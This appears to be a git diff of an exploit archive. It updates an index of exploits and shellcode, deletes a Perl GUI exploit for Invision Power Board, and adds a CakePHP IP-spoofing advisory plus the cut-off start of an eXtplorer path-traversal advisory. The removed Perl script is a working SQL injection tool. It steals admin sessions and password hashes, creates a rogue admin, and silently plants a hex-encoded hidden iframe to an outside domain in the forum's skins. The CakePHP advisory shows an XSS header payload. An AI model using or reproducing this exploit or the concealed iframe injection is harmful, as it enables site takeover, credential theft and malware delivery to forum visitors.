35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0
@ -35346,7 +35343,7 @@ id,file,description,date,author,platform,type,port
39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
39102,platforms/windows/local/39102.py,"EasyCafe Server <= 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0
39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0
39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
@ -35394,8 +35391,8 @@ id,file,description,date,author,platform,type,port
39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39151,platforms/lin_x86-64/shellcode/39151.c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152.c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
@ -35999,7 +35996,14 @@ id,file,description,date,author,platform,type,port
39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0

Can't render this file because it is too large.

0
platforms/lin_x86-64/shellcode/39151..c → platforms/lin_x86-64/shellcode/39151.c
View file

0
platforms/linux/shellcode/39152..c → platforms/linux/shellcode/39152.c
View file

0
platforms/multiple/webapps/31329..txt → platforms/multiple/webapps/31329.txt
View file

390
platforms/php/webapps/28221.pl
View file

@ -1,390 +0,0 @@
source: http://www.securityfocus.com/bid/18984/info
Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
#!/usr/bin/perl
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "r57ipb216gui" );
$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = 'billy@microsoft.com';
$report = '';
$group = 4;
$curr_user = 0;
$rand_session = &session();
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';
$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
$b2->insert("end", "members");
$b2->insert("end", "members_converge");
$b2->pack( -side => "top" , -anchor => 'w');
$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack( -side => "top" , -anchor => 'w' );
$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w');
$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w');
$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fright->Button(-text => 'Test forum vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();
$fright->Button(-text => 'Get database tables prefix',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_prefix
)->pack();
$fright->Button(-text => 'Get data from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_data
)->pack();
$fright->Button(-text => 'Get admin session',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_admin
)->pack();
$fright->Button(-text => 'Create new admin',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&create_admin
)->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();
MainLoop();
sub update_columns()
{
$b->delete(0,"end");
if($table eq 'members'){
$column = "member_login_key";
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
} elsif($table eq 'members_converge'){
$column = "converge_pass_hash";
$b->insert("end", "converge_pass_hash");
$b->insert("end", "converge_pass_salt");
$b->insert("end", "converge_email");
}
}
sub get_admin()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }
else { $sql = ''; }
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
$error = 0;
$rep = '';
if($res->is_success)
{
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; }
else { $error = 1; }
if(!$error)
{
$rep = '';
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; }
else { $error = 1; }
if(!$error){
if($curr_user != 1)
{
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
}
else
{
$session_user_id = $user_id;
}
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
}
$InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;
$InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
if($error)
{
$InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
sub get_data()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
if($table eq 'members') { $id_text = 'id'; }
if($table eq 'members_converge') { $id_text = 'converge_id'; }
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; }
else
{
$InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
sub create_admin()
{
$InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
if($session_id eq '' || $session_ip_address eq '')
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
}
elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
}
else
{
$xpl = LWP::UserAgent->new( ) or die;
($url2 = $url) =~ s/index.php/admin.php/;
$cf = '';
%fields = (
'code' => 'doadd',
'act' => 'mem',
'section' => 'content',
'name' => $new_admin_name,
'password' => $new_admin_password,
'email' => $new_admin_email,
'mgroup' => $group,
);
if($use_custom_fields)
{
@cf = split(',',$custom_fields);
foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
}
$res = $xpl->post($url2."?adsess=$session_id",
[
%fields,
],
'USER_AGENT'=>'',
'CLIENT_IP'=>"$session_ip_address",
'X_FORWARDED_FOR'=>"$session_ip_address");
$if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
$query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
$res = $xpl->post($url2."?adsess=$session_id",
[
'code' => 'runsql',
'act' => 'sql',
'section' => 'admin',
'query' => $query,
],
'USER_AGENT'=>'',
'CLIENT_IP'=>"$session_ip_address",
'X_FORWARDED_FOR'=>"$session_ip_address");
$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;
$InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub test_vuln()
{
$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub get_prefix()
{
$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /FROM (.*)sessions/)
{
$prefix = $1;
$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
}
else
{
$InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub session()
{
return 'r57ipb216_for_IDS';
}

284
platforms/php/webapps/39813.txt Executable file
View file

@ -0,0 +1,284 @@
=============================================
- Release date: 12.05.2016
- Discovered by: Dawid Golunski
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability
3.1.11
2.8.1
2.7.10
2.6.12
II. BACKGROUND
-------------------------
- CakePHP Framework
http://cakephp.org/
"CakePHP makes building web applications simpler, faster and require less code.
CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer
and a powerful scaffolding system that makes building both small and complex
systems a breeze. "
III. INTRODUCTION
-------------------------
CakePHP Framework contains a vulnerability that allows to spoof the source IP
address. This can allow to bypass access control lists, or injection of
malicious data which, if treated as sanitized by an unaware CakePHP-based
application, can lead to other vulnerabilities such as SQL injection, XSS,
command injection etc.
IV. DESCRIPTION
-------------------------
Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
allows to obtain the IP address of a client accessing a CakePHP-based
application. The is slightly different in each branch:
CakePHP 2.x:
------[ Cake/Network/CakeRequest.php ]------
public function clientIp($safe = true) {
if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR'));
} else {
if (env('HTTP_CLIENT_IP')) {
$ipaddr = env('HTTP_CLIENT_IP');
} else {
$ipaddr = env('REMOTE_ADDR');
}
}
if (env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
CakePHP 3.x:
------[ cakephp/src/Network/Request.php ]------
/**
* Get the IP the client is using, or says they are using.
*
* @return string The client IP.
*/
public function clientIp()
{
if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR'));
} else {
if ($this->env('HTTP_CLIENT_IP')) {
$ipaddr = $this->env('HTTP_CLIENT_IP');
} else {
$ipaddr = $this->env('REMOTE_ADDR');
}
}
if ($this->env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = $this->env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
Both of the methods contain the same vulnerability. Despite the safe flag
(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they
both use HTTP_CLIENT_IP request header (if it exists) instead of the
REMOTE_ADDR variable set by the web server.
The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
in a HTTP request.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
A) Simple PoC
Download a vulnerable version of CakePHP framework and edit
src/Template/Pages/home.ctp to include the PoC code below
which echoes the visitor's IP using the clientIp() method:
-------[ src/Template/Pages/home.ctp ]--------
<?php
[...]
use Cake\Cache\Cache;
use Cake\Core\Configure;
use Cake\Datasource\ConnectionManager;
use Cake\Error\Debugger;
use Cake\Network\Exception\NotFoundException;
$this->layout = false;
if (!Configure::read('debug')):
throw new NotFoundException();
endif;
$cakeDescription = 'CakePHP: the rapid development php framework';
echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";
[...]
?>
----------------------------------------------
If we send the following request with CLIENT-IP header containing an arbitrary
IP and malicious XSS data:
GET /cake/cake3/ HTTP/1.1
Host: centos
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
Content-Length: 2
the application will give the following response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
PoC
<br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]
[...]
As we can see the clientIp() method returns the fake IP and XSS payload
from CLIENT-IP header.
B) Croogo CMS exploit
An example application vulnerable to this bug is Croogo CMS:
https://croogo.org/
"Croogo is a free, open source, content management system for PHP,
released under The MIT License. It is powered by CakePHP MVC framework.
It was first released on October 07, 2009"
In one of its scripts we can find the isWhitelistedRequest() which
takes care of ACLs:
-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------
/**
* Check wether request is from a whitelisted IP address
*
* @see CakeRequest::addDetector()
* @param $request CakeRequest Request object
* @return boolean True when request is from a whitelisted IP Address
*/
public static function isWhitelistedRequest(CakeRequest $request) {
if (!$request) {
return false;
}
$clientIp = $request->clientIp();
$whitelist = array_map(
'trim',
(array)explode(',', Configure::read('Site.ipWhitelist'))
);
return in_array($clientIp, $whitelist);
}
-------------------------------------------------------------------
As we can see, it uses the affected clientIp() function from CakePHP framework.
VI. BUSINESS IMPACT
-------------------------
This vulnerability could be used to bypass access control lists to get
access to sensitive data, or lead to higher severity vulnerabilities
if untrusted data returned by clientIp() method is treated as safe and used
without appropriate sanitization within SQL queries, system command calls etc.
VII. SYSTEMS AFFECTED
-------------------------
According to the vendor, the following versions of CakePHP framework should be
affected by this issue.
3.1.11
3.2.4
2.8.1
2.7.10
2.6.12
VIII. SOLUTION
-------------------------
The vendor has released patched versions.
Install the latest version from the link below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt
Vendor security CakePHP releases:
http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
12.05.2016 - Final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

134
platforms/php/webapps/39816.php Executable file
View file

@ -0,0 +1,134 @@
/*
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
[+] ISR: apparitionsec
Vendor:
==============
extplorer.net
Product:
==================
eXtplorer v2.1.9
eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
directories, edit, copy, move, delete,
search, upload and download files, create & extract archives, create new
files and directories, change file
permissions (chmod) and more. It is often used as FTP extension for popular
applications like Joomla.
Vulnerability Type:
======================
Archive Path Traversal
CVE Reference:
==============
CVE-2016-4313
Vulnerability Details:
=====================
eXtplorer unzip/extract feature allows for path traversal as decompressed
files can be placed outside of the intended target directory,
if the archive content contains "../" characters. This can result in files
like ".htaccess" being overwritten or RCE / back door
exploits.
Tested on Windows
Reproduction steps:
==================
1) Generate an archive using below PHP script
2) Upload it to eXtplorer and then extract it
3) Check directory for the default 'RCE.php' file or use CL switch to
overwrite files like .htaccess
Exploit code(s):
===============
Run below PHP script from CL...
[evil-archive.php]
*/
<?php
